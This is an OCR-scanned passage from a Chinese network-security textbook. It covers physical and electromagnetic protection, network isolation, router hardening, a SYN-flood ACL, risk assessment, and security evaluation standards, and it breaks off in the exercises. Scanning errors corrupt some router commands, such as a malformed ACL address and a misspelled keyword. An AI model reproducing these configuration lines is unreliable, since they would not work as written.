保护 层 进行 分 类 保护 ， 比 如 对 UPS 可 以 设置 三 级 防护 :一 级 防护 是 在 机 房 配 电 柜 前 装 三 
相 电 源 防 雷 器 ， 二 级 防护 是 在 UPS 电源 前 装 三 相 电 源 防 雷 器 ; 三 级 防护 是 在 重要 设备 处 
装 电源 防 雷 插座 。 雷 电 保护 分 为 对 电源 的 保护 和 对 信号 的 保护 ， 保 护 的 方法 有 加 装 避 雷 针 
(网 、 线 、 带 ) 和 建立 接地 系统 。 


1.3.4 设备 的 安全 保护 


设备 的 安全 涉及 存储 设备 、 网 络 设备 以 及 提供 各 种 服务 的 服务 器 等 ， 是 实体 安全 中 的 
重要 一 环 。 


1. 电磁 辐射 的 保护 


电磁 辐射 又 称 电子 烟雾 ， 指 能 量 以 电磁 波 的 形式 通过 空间 传播 的 现象 ， 由 空间 共同 移 
送 的 电能 量 和 磁 能 量 组 成 。 

电磁 辐射 的 危害 主要 表现 在 两 个 方面 : 一 方面 电磁 辐射 形成 电磁 干扰 ， 影 响 设备 的 正 
常 工作 ， 另 一 方面 电子 设备 辐射 出 的 电磁 波 携带 有 用 信号 ， 如 果 这 些 信 号 被 别有用心 的 人 
截获 ， 很 容易 造成 信息 泄露 ， 而 且 这 种 攻击 行为 不 易 被 发 现 。 

对 于 电磁 辐射 的 保护 可 以 按 层次 进行 : 

(1) 网 络 机 房 选 址 时 应 远离 电磁 干扰 源 ， 如 无 线 电 广播 发 射 塔 、 雷 达 站 和 变电站 等 。 
按照 国家 规定 ， 机 房 内 无 线 电 干扰 场 强 在 频率 范围 为 0.15 一 500MHz 时 不 大 于 126dB， 磁 
场 干扰 场 强 不 大 于 800A/m。 

(2) 机 房 建设 时 应 采取 接地 和 相应 的 屏蔽 措施 。 接 地 可 以 防止 外 界 电磁 场 干 扰 和 设备 
间 寄 生 电 容 的 耦合 干扰 ;机 房 屏蔽 包括 金属 网 状 屏蔽 和 金属 板式 屏蔽 ， 可 以 有 效 地 减少 外 
界 对 设备 的 电磁 干扰 。 

(3) 选择 设备 时 ， 尽 力 使 用 辐射 比较 低 的 网 络 设备 ， 对 设备 采取 接地 措施 。 

(4) 对 于 通信 线路 上 的 电磁 辐射 ， 可 以 采取 线路 屏蔽 和 数据 加 密 措施 ， 防 止 非法 攻击 
者 截获 和 解密 。 

(5) 采用 TEMPEST 技术 对 电磁 辐射 进行 防护 和 抑制 。TEMPEST 技术 包括 了 对 电磁 
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泄露 信号 中 所 携带 的 敏感 信息 进行 分 析 、 测 试 、 接 收 、 还 原 以 及 防护 的 一 系列 技术 。 
TEMPEST 主要 的 防护 措施 有 : 使 用 低 辐 射 设备 、 电 磁 屏 蔽 、 滤 波 技 术 、 利 用 噪声 干扰 源 
和 光纤 传输 等 。 


2. 物理 隔离 技术 


随 着 网 络 的 不 断 发 展 ， 网 络 应 用 越 来 越 深 地 渗透 到 政府 、 金 融 、 国 防 等 关键 领域 ， 这 
些 领域 对 网 络 安全 的 要 求 非常 高 。 另 一 方面 ， 网 络 攻击 的 利益 性 目标 越 来 越 明确 ， 且 攻击 
越 来 越 频繁 。 按 照 国家 规定 ， 涉 及 国家 秘密 的 计算 机 信息 系统 ， 不 得 直接 或 间接 地 与 国际 
互联 网 或 其 他 公共 信息 网 络 相连 接 ， 必 须 实 行 物理 隔离 。 物 理 隔离 是 指 内 部 网 不 直接 或 间 
接地 连接 公共 网 。 

物理 隔离 技术 的 目标 是 确保 把 有 害 的 攻击 隔离 在 可 信 网 络 之 外 和 保证 可 信 网 络 内 部 信 
息 不 外 泄 的 前 提 下 ， 完 成 网 间 数 据 的 安全 交换 。 物 理 隔 离 能 够 保护 路 由 器 、 服 务 器 等 网 络 
设备 和 通信 链 路 免 受 自然 灾害 和 人 为 攻击 的 威胁 ， 而 且 物 理 隔离 也 为 内 部 网 划 定 了 明确 的 
安全 边界 ， 使 得 网 络 的 可 控 性 增强 ， 便 于 内 部 管理 。 

物理 隔离 在 安全 上 的 要 求 主要 有 以 下 3 点 : 

(1) 在 物理 传导 上 使 内 外 网 络 隔断 ， 确 保 外 部 网 络 不 能 通过 网 络 连接 而 侵入 内 部 网 
络 ;同时 防止 内 部 网 络 信息 通过 网 络 连接 泄露 到 外 部 网 络 。 

(2) 在 物理 辐射 上 隔断 内 部 网 络 与 外 部 网 络 ， 确 保 内 部 网 络 信息 不 会 通过 电磁 辐射 或 
耦合 方式 泄露 到 外 部 网 络 。 

(3) 在 物理 存储 上 隔断 内 外 网 两 个 网 络 环境 ， 对 于 断 电 后 遗失 信息 的 部 件 ， 如 内 存 、 
处 理 器 等 暂 存 部 件 ， 要 在 网 络 转换 时 做 清除 处 理 ， 防 止 残留 信息 出 网 ， 对 于 断 电 非 遗失 性 
设备 ， 如 磁带 机 、 硬 盘 等 存储 设备 ， 内 部 网 与 外 部 网 要 分 开 存储 。 

物理 隔离 技术 实际 上 是 创建 一 种 网 络 运行 环境 : 内 网 和 外 网 在 物理 上 可 以 隔离 断 开 ， 
但 却 仍然 实现 逻辑 相连 ， 通 过 分 时 操作 来 实现 两 个 网 络 之 间 更 安全 的 信息 交换 。 图 1-4 显 
示 了 被 隔离 的 网 络 之 间 数 据 交换 的 过 程 。 

被 隔离 的 网 络 在 无 数据 交换 的 情况 下 (如 图 1-4(a) 所 示 )， 隔 离 设备 和 外 网 、 隔 离 设 备 
和 内 网 、 外 网 和 内 网 之 间 完 全 断 开 。 隔 离 设 备 可 以 理解 为 由 一 个 纯粹 的 存储 介质 和 一 个 单 
纯 的 调度 和 控制 电路 组 成 。 

如 果 内 网 要 发 送 数 据 到 外 网 (如 图 1-4(b) 所 示 )， 内 部 的 服务 器 会 发 起 对 隔离 设备 的 非 
TCP/IP 协议 的 数据 连接 ， 隔 离 设 备 将 所 有 的 协议 剥离 ， 把 原始 数据 写 入 到 存储 介质 中 。 
根据 不 同 的 应 用 ， 有 时 需要 对 接收 的 数据 进行 完整 性 和 安全 性 检查 ， 如 是 否 带 有 病毒 和 恶 
意 代码 等 。 

一 旦 数据 完全 写 入 隔离 设备 的 存储 介质 ， 隔 离 设 备 立 即 中 断 与 内 网 的 连接 ， 然 后 发 起 
对 外 网 的 非 TCP/IP 协议 的 数据 连接 。 连 接 成 功 后 ， 隔 离 设 备 向 外 网 发 送 数据 ， 外 网 收 到 
数据 后 ， 进 行 TCP/IP 封装 和 应 用 协议 的 封装 ， 并 交 给 应 用 系统 ， 如 图 1-4(c) 所 示 。 

外 网 成 功 地 接收 数据 后 ， 隔 离 设备 立即 切断 与 外 网 的 连接 ， 如 图 1-4(d) 所 示 ， 至 此 ， 
隔离 网 络 的 一 次 通信 结束 。 

实现 物理 隔离 的 技术 手段 主要 有 : 彻底 的 物理 隔离 、 协 议 隔离 和 物理 隔离 网 闸 。 

(1) 彻底 的 物理 隔离 是 指 内 外 网 完全 断 开 ， 内 外 网 之 间 无 信息 交换 ， 能 够 彻底 地 保护 
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内 网 的 安全 。 

(2) 协议 隔离 是 指 在 两 个 或 两 个 以 上 可 路 由 的 网 络 间 部 署 不 可 路 由 的 协议 (如 
IPX/SPX、NetBEUI 等 )， 实 现 数据 交换 。 它 的 优点 是 能 抵御 基于 TCP/IP 协议 的 网 络 扫描 
和 攻击 等 行为 ， 缺 点 是 有 些 攻击 可 穿 透 网 络 。 


Se oe Se 


图 1-4 ”物理 隔离 原理 示意 图 


(3) 物理 隔离 网 六 主要 由 内 网 处 理 单元 、 外 网 处 理 单元 、 安 全 隔离 与 信息 交换 处 理 单 
元 三 部 分 组 成 。 内 网 处 理 单元 与 内 网 相连 ; 外 网 处 理 单元 与 外 网 相连 ， 安 全 隔离 与 信息 交 
换 处 理 单元 通过 专用 硬件 断 开 内 、 外 网 的 物理 连接 ， 并 在 任何 时 刻 只 与 其 中 一 个 网 络 连 
接 ， 读 取 等 待 发 送 的 数据 ， 然 后 “推送 ”到 另 一 个 网 络 上 。 在 切换 速度 非常 快 的 情况 下 ， 
可 以 实现 信息 的 实时 交换 。 物 理 隔离 网 六 不 但 实现 了 高 速 的 数据 交换 ， 还 有 效 地 杜绝 了 基 
于 网 络 的 攻击 行为 ， 但 是 它 的 应 用 种 类 会 受到 一 定 的 限制 。 

安全 和 效率 不 能 兼 得 ， 物 理 隔 离 要 做 到 内 网 的 安全 ， 必 然 会 降低 数据 交换 的 效率 ， 也 
会 给 用 户 操作 带 来 诸多 不 便 。 物 理 隔离 技术 应 该 做 到 以 下 几 点 ， 才 能 满足 市 场 需求 。 

(1) 高 度 安 全 :物理 隔离 要 从 物理 链 路 上 切断 网 络 连接 ， 切 断 网 络 攻击 和 病毒 传播 的 
路 径 ， 使 网 络 安全 达到 一 个 更 高 的 层次 。 

(2) 成 本 低 、 易 部 署 : 实现 物理 隔离 的 成 本 不 能 过 高 ， 部 署 上 也 应 该 比较 方便 ， 不 能 
影响 两 个 网 络 之 前 的 功能 和 正常 使 用 。 

(3) 操作 简单 : 物理 隔离 技术 应 用 的 使 用 对 象 是 普通 的 工作 人 员 ， 客 户 端的 操作 要 力 
求 简单 、 方 便 。 


3. 设备 的 访问 控制 保护 
除了 对 网 络 设备 的 硬件 保护 外 ， 也 应 该 从 配置 上 制定 一 些 安全 策略 来 保护 设备 的 访问 
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安全 ， 如 关闭 不 必要 的 应 用 和 服务 、 制 定 访问 控制 策略 等 。 下 面 是 对 设备 进行 安全 管理 要 
考虑 的 安全 策略 : 

(1) 设备 的 管理 由 专人 负责 。 对 设备 的 任何 一 次 维护 都 要 记录 备案 ， 制 定 完备 的 安全 
访问 策略 和 维护 记录 日 志 。 

(2) 关键 设备 禁止 远程 访问 。 对 于 需要 远程 访问 的 设备 ， 应 该 配置 访问 控制 列表 和 高 
安全 强度 的 密码 。 

(3) 为 设备 的 重要 配置 和 数据 做 安全 备份 ， 及 时 升级 和 修补 操作 系统 的 相关 软件 ， 及 
时 打 补 丁 。 

(4) 对 超级 用 户 和 特权 模式 设置 高 强度 密码 ， 特 权 模式 的 密码 设置 使 用 enable secret 
命令 (不 使 用 enable password 命令 )， 并 启用 Service password-encryption 。 

(5) 严格 控制 CON 端口 和 AUX 端口 的 访问 ， 包 括 关 闭 端口 、 设 置 高 强度 密码 、 使 
用 访问 控制 列表 等 。 

(6) 对 设备 和 系统 提供 的 一 些 服 务 和 功能 ， 如 果 不 用 ， 应 该 关闭 ， 比 如 Finger 服务 、 
HTTP 服务 、ARP-Proxy 等 。 

【案例 1-4】 路 由 器 的 安全 配置 : 为 路 由 器 明文 口令 加 密 ， 特 权 模式 口令 采用 MD5 
加 密 ; 只 允许 管理 员 机 器 对 路 由 器 远程 访问 ， 且 绑 定 管理 主机 MAC; 为 OSPF 路 由 协议 
配置 MD5 认证 ， 禁 用 不 需要 的 服务 : Finger 服务 ，TCP、UDP Small 服务 ，HTTP 服务 ， 
BOOTp 服务 ，IP Source Routing 服务 。 其 命令 如 下 : 

RouterName #service password-encryption 

RouterName #enable secret XXXXXX 

RouterName #access-list 20 permit host 210.31.192.20 

RouterName #arp 210.31.192.20 E069.95D3.C695 arpa 

为 OSPF 路 由 设置 MD5 认证 : 

RouterName #ip ospf authentication-key 0 password 

RouterName #router ospf 100 

RouterName area 0.0.0.0 authentication 

禁用 服务 (进入 配置 模式 ) : 

RouterName #configure 

RouterName (config)#no ip finger 

RouterName (config)#no service finger 

RouterName (Config)#no service tcp-small-servers 

RouterName (Config)#no service udp-small-servers 

RouterName (config)#no ip http server 

RouterName (config)#no bootp server 

RouterName (config)#no ip source-route 

【案例 1-5】SYN 攻击 利用 TCP 的 三 次 握手 机 制 ， 通 过 发 送 大 量 的 半 连 接 请 求 ， 耗 
费 目 标 机 的 CPU 和 内 存 资源 ， 危 害 极 大 ， 可 在 路 由 器 上 通过 访问 列表 进行 防范 ， 命 令 
如 下 : 

RouterName (Config)#no access-list 118 

RouterName (config)#access-list 118 permit tcp any 192.168.0.0.0.0.0.255 


establisted 
RouterName (config)#access-list 118 deny ip any any log 
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RouterName (config)#interface eth 0/2 

RouterName (config-if)#description "campus network" 
RouterName (config-if)#ip address 10.16.2.254 255.255.255.0 
RouterName (config-if)#ip access-group 118 in 


1.4 网 络 安全 评估 


网 络 安全 评估 是 信息 安全 保障 工作 的 基础 性 工作 和 重要 环节 ， 是 信息 安全 等 级 保护 制 
度 建 设 的 重要 科学 方法 之 一 。 


1.4.1 安全 风险 评估 


网 络 安全 风险 评估 就 是 从 风险 管理 角度 ， 运 用 科学 的 方法 和 手段 ， 系 统 地 分 析 网 络 和 
信息 系统 所 面临 的 威胁 及 其 存在 的 脆弱 性 ， 评 估 安 全 事件 一 旦 发 生 可 能 造成 的 危害 程度 ， 
提出 有 针对 性 的 抵御 威胁 的 防护 对 策 和 整改 措施 ， 为 防范 和 化 解 网 络 安全 风险 ， 将 风险 控 
制 在 可 接受 的 水 平 ， 最 大 限度 地 保障 网 络 的 安全 。 

网 络 安全 风险 评估 是 一 项 复杂 的 系统 工程 ， 贯 穿 于 网 络 系统 的 规划 、 设 计 、 实 施 、 运 
行 维护 以 及 废弃 各 个 阶段 ， 其 评估 体系 受 多 种 主观 和 客观 、 确 定 和 不 确定 、 自 身 和 外 界 的 
等 多 种 因素 的 影响 。 事 实 上 ， 风 险 评估 涉及 诸多 方面 ， 主 要 包含 风险 分 析 、 风 险 评估 、 安 
全 决策 和 安全 监测 4 个 环节 ， 如 图 1-5 所 示 。 


1-5 “安全 风险 评估 涉及 的 4 个 环节 
1. 风险 分 析 和 风险 评估 


风险 分 析 是 安全 风险 评估 的 第 一 个 环节 。 风 险 指 丢 失 所 需要 保护 资产 的 可 能 性 ， 风 险 
分 析 即 估计 网 络 威胁 发 生 的 可 能 性 ， 以 及 因 系 统 的 脆弱 性 而 引起 的 潜在 损失 。 大 多 数 风险 
分 析 最 初 要 对 网 络 资产 进行 确认 和 评估 ， 再 用 不 同 的 方法 进行 损失 计算 。 

风险 分 析 中 要 涉及 资产 、 威 胁 、 脆 弱 性 三 个 基本 要 素 ， 如 图 1-6 所 示 。 每 个 要 素 有 各 
自 的 属性 ， 资 产 的 属性 是 资产 价值 威胁 的 属性 可 以 是 威胁 主体 、 影 响 对 象 、 出 现 频率 、 
动机 等 ， 脆 弱 性 的 属性 是 资产 弱点 的 严重 程度 。 风 险 分 析 的 主要 内 容 有 以 下 几 点 : 

@ ”对 资产 进行 识别 ， 并 对 资产 的 价值 进行 赋值 ; 
对 威胁 进行 识别 ， 描 述 威胁 的 属性 ， 并 对 威胁 出 现 的 频率 赋值 ; 
对 脆弱 性 进行 识别 ， 并 对 具体 资产 脆弱 性 的 严重 程度 赋值 
根据 威胁 及 威胁 利用 脆弱 性 的 难 易 程 度 判断 安全 事件 发 生 的 可 能 性 ; 
根据 脆弱 性 的 严重 程度 及 安全 事件 所 作用 的 资产 价值 计算 安全 事件 的 损失 ; 
根据 安全 事件 发 生 的 可 能 性 以 及 安全 事件 出 现 后 的 损失 ， 计 算 安全 事件 一 旦 发 生 
对 组 织 的 影响 ， 即 风险 值 。 
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安全 事件 的 可 能 性 


威胁 识别 威胁 出 现 的 频率 


安全 事件 的 损失 


图 1-6 安全 风险 分 析 和 评估 原理 图 


风险 评估 所 采用 的 方法 直接 影响 到 评估 过 程 的 每 个 环节 ， 甚 至 左右 最 终 的 评估 结果 ， 
影响 评估 的 有 效 性 。 因 此 要 根据 网 络 的 具体 情况 和 要 求 ， 选 择 适 当 的 风险 评估 方法 。 风 险 
评估 的 方法 有 很 多 ， 概 括 起 来 可 分 为 两 大 类 : 定量 评估 法 和 定性 评估 法 。 
e@ ”定量 评估 法 是 指 运用 数量 指标 来 对 风险 进行 评估 ， 对 构成 风险 的 各 个 要 素 和 潜在 
的 损失 水 平 赋予 数值 。 一 般 使 用 分 布 状态 函数 ， 并 将 风险 定义 为 分 布 状态 函数 的 
某 一 函数 。 典 型 的 定量 分 析 方法 有 因子 分 析 法 、 聚 类 分 析 法 、 时 序 模 型 、 回 归 模 
型 等 。 定 量 分 析 的 结果 科学 、 直 观 、 便 于 理解 。 
e@ 定性 评估 法 主要 依据 研究 者 的 知识 、 经 验 、 历 史 教训 、 政 策 走 向 及 特殊 实例 等 非 
量化 资料 ， 对 系统 风险 状况 做 出 判断 。 运 用 这 类 方法 可 以 找 出 系统 中 存在 的 危 
险 、 有 害 因素 ， 进 一 步 根据 这 些 因 素 从 技术 上 、 管 理 上 、 教 育 上 提出 对 策 措施 ， 
加 以 控制 ， 达 到 系统 安全 的 目的 。 目 前 应 用 较 多 的 方法 有 安全 检查 表 (SCL)、 事 
故 树 分 析 (FTA)、 事 件 树 分 析 (ETA)、 和 危险 度 评价 法 等 。 定 性 评估 法 操作 起 来 较 
为 简单 ， 但 通常 只 关注 威胁 事件 带 来 的 损失 而 忽略 事件 发 生 的 概率 。 


2. 安全 决策 


在 完成 对 网 络 的 安全 风险 分 析 和 评估 后 ， 就 要 根据 评估 的 结论 决定 下 一 步 要 采取 的 安 
全 措施 ， 制 定 有 针对 性 的 安全 策略 ， 使 网 络 威胁 得 到 有 效 控制 。 安 全 策略 的 制定 要 依据 科 
学 性 、 合 理性 、 有 效 性 、 便 于 实施 的 原则 。 


3. 安全 监测 


网 络 运行 期 间 ， 系 统 随时 都 有 可 能 发 生变 化 ， 比 如 添加 新 的 网 络 设备 、 软 件 升级 、 接 
入 新 的 子 网 等 都 将 导致 系统 结构 和 资产 发 生变 化 。 此 时 先前 的 安全 评估 结论 就 失去 了 意 
义 ， 需 要 重新 进行 风险 分 析 、 风 险 评估 和 安全 决策 ， 来 适应 网 络 系统 的 新 变化 。 安 全 检测 
过 程 能 够 实时 监视 和 判断 网 络 系统 中 的 各 种 资产 在 运行 期 间 的 状态 信息 ， 并 及 时 记录 和 发 
现 新 的 变化 情况 。 

通过 网 络 安全 风险 评估 ， 及 早 发 现 网 络 系统 的 安全 隐患 并 采取 加 固 方案 ， 已 经 成 为 网 
络 安全 保障 体系 建设 必 不 可 少 的 一 个 组 成 部 分 。 风 险 评估 的 核心 工作 是 采用 多 种 方法 对 网 
络 系统 可 能 存在 的 漏洞 进行 检测 ， 找 出 可 能 被 黑客 利用 的 安全 隐患 ， 管 理 员 依 据 检测 结果 
进行 安全 分 析 ， 制 定 修补 策略 ， 以 便 尽 早 采取 措施 ， 保 护 网 络 资产 免 受 侵害 。 
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1.4.2 ”国外 安全 评估 标准 


网 络 安全 保障 体系 的 建设 是 一 个 庞大 而 复杂 的 系统 ， 必 须 具 备 配 套 安全 标准 。 安 全 标 
准 就 是 确保 安全 产品 和 系统 在 设计 、 研 发 、 生 产 、 建 设 、 使 用 、 测 评 过 程 中 ， 解 决 产 品 和 
系统 的 一 致 性 、 可 靠 性 、 可 控 性 、 先 进 性 和 符合 性 的 技术 规范 及 依据 。 


1. 美国 TCSEC( 橘 皮 书 ) 


1983 年 ， 美 国 国防 部 制定 了 5200.28 安全 标准 一 一 可 信 计 算 机 系统 评价 准则 (Trusted 
Computer System Evaluation Criteria，TCSEC)， 也 称 网 络 安全 橘 皮 书 ， 使 用 计算 机 安全 级 
别 来 评价 一 个 计算 机 系统 的 安全 性 。 

该 标准 多 年 来 一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 标准 。 其 他 方面 ， 如 数据 
安全 、 网 络 安 全 也 一 直 是 通过 该 准则 来 评估 ， 如 可 信任 网 络 解释 和 可 信任 数据 库 解 释 。 
TCSEC 把 安全 级 别 从 低 到 高 划分 为 4 个 安全 级 别 : D 类 、C 类 、B 类 和 A 类 ， 大 类 下 面 
又 分 小 类 ， 如 表 1-1 所 示 。 


表 1-1 安全 级 别 分 类 


类 别 级 _ 别 名 称 主要 特征 

D D 低级 保护 没有 安全 保护 

6 ci 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ， 安 全 标识 
Bl 标识 的 安全 保护 强制 存 取 控制 ， 安 全 标识 

B B2 结构 化 保护 面向 安全 体系 结构 ， 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监控 、 高 抗 渗透 能 力 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 


安全 级 别 设计 必须 从 数学 角度 上 进行 验证 ， 而 且 必须 进行 秘密 通道 和 可 信任 分 布 分 
析 。 可 信任 分 布 (Trusted Distribution) 是 指 硬件 和 软件 在 物理 传输 过 程 中 受到 保护 以 防止 破 
坏 安全 系统 。 橘 皮 书 也 存在 不 足 之 处 : 它 只 针对 孤立 计算 机 系统 ， 特 别 是 小 型 机 和 主机 系 
统 。 假 设 有 一 定 的 物理 保障 ， 该 标准 适合 政府 和 军队 ， 不 适合 企业 ， 因 为 模型 是 静态 的 。 


2. 欧洲 标准 ITSEC 


欧洲 的 安全 评价 标准 (Information Technology Security Evaluation Criteria，ITSEC) 是 英 
国 、 法 国 、 德 国 和 荷兰 制定 的 IT 安全 评估 准则 ， 是 欧洲 多 国安 全 评价 方法 的 综合 产物 。 

ITSEC 与 TCSEC 不 同 ， 它 不 把 保密 措施 与 计算 机 功能 直接 联系 ， 而 是 只 叙述 技术 安 
全 的 要 求 ， 把 保密 作为 安全 增强 功能 。 另 外 ，TCSEC 把 保密 作为 安全 的 重点 ， 而 ITSEC 
则 认为 完整 性 、 可 用 性 与 保密 性 处 于 同等 重要 的 位 置 。ITSEC 把 安全 概念 分 为 功能 和 评估 
两 部 分 ， 定 义 了 从 E0 级 到 E6 级 共 7 个 安全 级 别 ， 对 于 每 个 系统 ，ITSEC 又 定义 了 10 种 
功能 Fl 到 F10， 其 中 前 5 种 与 TCSEC 中 C1 到 B3 基本 相似 ，F6 到 F10 级 分 别 对 应 数据 
和 程序 的 完整 性 、 系 统 的 可 用 性 、 数 据 通 信 的 完整 性 、 数 据 通 信 的 保密 性 以 及 机 密 性 等 
内 容 。 
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3. 加 拿 大 标准 CTCPEC 


加 拿 大 可 信任 计算 机 产品 评估 标准 (Canadian Trusted Computer Product Evaluation 
Criteria，CTCPEC) 于 1989 年 公布 ，1993 年 推出 3.0 版 本 。CTCPEC 3.0 综合 了 美国 
TCSEC 和 欧洲 ITSEC 的 优点 。 
CTCPEC 对 开发 的 产品 或 评估 过 程 强调 功能 和 保证 两 个 部 分 : 
e@ ”功能 (Functionality): 功能 包括 保密 性 、 完 整 性 、 可 用 性 和 审核 4 个 方面 的 标准 ， 
这 4 个 标准 可 能 存在 一 定 的 相互 依赖 关系 ， 如 果 这 些 标准 在 不 同 服务 之 间 存 在 相 
互 依赖 关系 ， 那 么 也 会 存在 约束 关系 。 

@ ”保证 (Assurance): 保证 包含 保证 标准 ， 是 指 产品 用 以 实现 组 织 安全 策略 的 可 信 
度 。 保 证 标准 评估 对 整个 产品 进行 。 

4. 美国 联邦 准则 (FC) 


美国 联邦 准则 综合 了 欧洲 的 ITSEC 和 加 拿 大 的 CTCPEC 的 优点 ， 用 来 提供 TCSEC 
的 升级 版 本 ， 同 时 保护 已 有 投资 。 该 标准 引入 了 保护 轮廓 的 概念 。 保 护 轮 廓 是 以 通用 要 求 
为 基础 创建 的 一 套 独特 的 IT 产品 安全 标准 。 保 护 轮廓 需要 对 设计 、 实 现 和 使 用 IT 产品 的 
要 求 进行 详细 说 明 。FC 起 初 只 是 一 个 过 渡 标 准 ， 后 来 结合 其 他 标准 才 发 展 为 共同 标准 。 
5. 通用 准则 (CC) 


1993 年， 德国、 法国、 荷兰、 英国 、 加 拿 大 和 美国 联合 在 一 起 ， 把 原 有 标准 组 合成 
一 个 单一 的 全 球 标准 ， 即 信息 技术 安全 评估 通用 准则 ， 简 称 通 用 准则 。 它 强调 将 安全 的 功 
能 与 保障 分 离 ， 并 将 功能 需求 分 为 9 类 63 族 ， 保 障 分 为 7 类 29 族 。 


6. ISO 安全 体系 结构 标准 


在 安全 体系 结构 方面 ，ISO 制定 了 国际 标准 ISO 7498-2:1989《 信 息 处 理 系统 、 开 发 系 
统 互 连 、 基 本 模型 第 2 部 分 安全 体系 结构 》。 该 标准 在 身份 认证 、 访 问 控制 、 数 据 加 密 、 
数据 完整 性 和 防止 抵赖 方面 提供 了 5 种 可 供 选 择 的 安全 服务 ， 如 下 所 示 : 

@ ”身份 认证 ; 证 明 用 户 级 服务 器 身份 的 过 程 。 

e@ ”访问 控制 用 户 身份 一 经 验证 就 发 生 访问 控制 ， 这 个 过 程 决定 用 户 可 以 使 用 、 浏 

览 或 改变 哪些 系统 资源 。 

数据 加 密 : 使 用 加 密 技术 保护 数据 免 于 未 授权 的 泄露 ， 可 避免 被 动 威胁 。 
数据 完整 性 ， 通过 检验 或 维护 信息 的 一 臻 性， 避免 主动 威胁 。 

防止 抵赖 方面 : 提供 关于 服务 、 过 程 或 部 分 信息 的 起 源 证 明 或 发 送 证 明 。 


1.4.3 国内 安全 评估 标准 


在 我 国 ， 根 据 GB 17859 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 和 
GA 163 一 1997《 计 算 机 信息 系统 安全 专用 产品 分 类 原则 》 等 ，1999 年 10 月 经 过 国家 质量 
技术 监督 局 批准 发 布 的 准则 将 计算 机 安全 保护 划分 为 5 个 级 别 。 

1) 第 一 级 

用 户 自 主 保护 级 。 本 级 的 计算 机 防护 系统 能 够 把 用 户 和 数据 隔 开 ， 使 用 户 具备 自主 的 
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安全 防护 能 力 。 用 户 可 以 根据 需求 采用 系统 提供 的 访问 控制 措施 来 保护 自己 的 数据 ， 避 免 
其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 

2) 第 二 级 

系统 审计 保护 级 。 这 一 级 除了 具备 第 一 级 所 有 的 安全 保护 功能 外 ， 还 要 求 创建 和 维护 
访问 的 审计 跟踪 记录 ， 使 所 有 用 户 对 自己 行为 的 合法 性 负责 。 本 级 使 计算 机 防护 系统 访问 
控制 更 加 精细 ， 人 允许 对 单个 文件 设置 访问 控制 。 

3) ”第 三 级 

安全 标记 保护 级 ， 除 具备 前 一 级 所 有 的 安全 保护 功能 外 ， 还 要 求 以 访问 对 象 标 记 的 安 
全 级 别 限制 访问 者 的 权限 ， 实 现 对 访问 对 象 的 强制 访问 。 该 级 别提 供 了 安全 策略 模型 、 数 
据 标记 以 及 严格 访问 控制 的 非 形式 化 描述 。 系 统 中 的 每 个 对 象 都 有 一 个 敏感 性 标签 ， 每 个 
用 户 都 有 一 个 许可 级 别 。 许 可 级 别 定义 了 用 户 可 处 理 的 敏感 性 标签 ， 系 统 中 每 个 文件 都 按 
内 容 分 类 并 标 有 敏感 性 标签 。 任 何 对 用 户 许可 级 别 和 成 员 分 类 的 更 改 都 受到 严格 控制 。 

4) 第 四 级 

结构 化 保护 级 。 除 具备 前 一 级 所 有 安全 保护 功能 外 ， 还 将 安全 保护 机 制 划分 为 关键 部 
分 和 非 关 键 部 分 ， 对 关键 部 分 可 直接 控制 访问 者 对 访问 对 象 的 存 取 ， 从 而 加 强 系 统 的 抗 渗 
透 能 力 。 系 统 的 设计 和 实现 要 经 过 彻底 的 测试 和 审查 ; 必须 对 所 有 目标 和 实体 实施 访问 控 
制 策略 ， 要 有 专职 人 员 负 责 实施 ， 要 进行 隐蔽 信道 分 析 ， 系 统 必 须 维护 一 个 保护 域 ， 保 护 
系统 的 完整 性 ， 防 止 外 部 干扰 。 

5) ”第 五 级 

访问 验证 保护 级 。 除 具备 前 一 级 所 有 的 安全 保护 功能 外 ， 还 特别 增设 了 访问 验证 功 
能 ， 负 责 仲裁 访问 对 象 的 所 有 访问 ， 也 就 是 访问 监控 器 。 访 问 监控 器 本 身 是 抗 自 改 的 ， 且 
足够 小 ， 能 够 分 析 和 测试 。 为 了 满足 访问 监控 器 的 需求 ， 计 算 机 防护 系统 在 其 构造 时 ， 排 
除 那些 对 实施 安全 策略 来 说 并 非 必要 的 部 件 ;在 设计 和 实现 时 ， 从 系统 工程 角度 将 其 复杂 
性 降 到 最 小 。 

虽然 国际 上 有 很 多 标准 化 组 织 在 信息 安全 方面 制定 了 许多 标准 ， 但 是 信息 安全 标准 关 
系 到 国家 的 安全 、 利 益 ， 任 何 国家 都 不 会 轻易 相信 和 依赖 别人 ， 都 会 制定 自己 的 标准 来 保 
护 本 国 利 益 。 我 国信 息 安全 标准 化 工作 虽然 起 步 较 晚 ， 但 近年 来 发 展 较 快 。“ 入 世 ” 后 ， 
标准 化 工作 在 公开 性 、 透 明度 等 方面 取得 了 实质 性 进展 ， 制 定 了 一 批 符合 中 国 国情 的 信息 
安全 标准 ， 为 信息 安全 的 开展 葛 定 了 基础 。 


1.5 本 章 小 结 


本 章 通过 案例 介绍 了 网 络 面临 的 威胁 和 安全 风险 ， 并 对 影响 网 络 安全 的 各 种 因素 进行 
了 分 析 ， 分 析 了 网 络 安 全 的 现状 和 发 展 趋势 ， 概 要 介绍 了 网 络 安全 的 概念 和 技术 特征 、 网 
络 安全 研究 的 目标 和 主要 内 容 、 主 要 的 网 络 安全 防护 技术 ; 重点 讲述 了 实体 安全 的 内 容 ， 
包括 机 房 安全 、 环 境 安全 和 设备 安全 ; 最 后 概要 介绍 了 网 络 安全 风险 评估 的 概念 和 流程 ， 
介绍 了 国内 外 网 络 安全 技术 评估 标准 、 通 用 准则 等 。 
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1.6 课 后 习题 


1. 填空 题 
(1) 被 动 攻击 的 目的 是 而 不 是 进行 访问 ， 在 不 影响 网 络 正常 工作 的 情况 下 ， 
攻击 者 通过 、 信 息 收 集 等 攻击 方法 截获 、 窃 取 、 破 译 来 获得 重要 机 密 
信息 。 
(2) 单纯 就 技术 而 言 ， 网 络 安全 涉及 计算 机 科学 、 网 络 技术 、 、 应 用 数 
学 、 密 码 技术 和 等 多 个 学 科 。 
(3) 常用 的 保密 技术 有 : 防 侦 收 、 防 辐 射 、 信 息 加 密 、 
2. 选择 题 
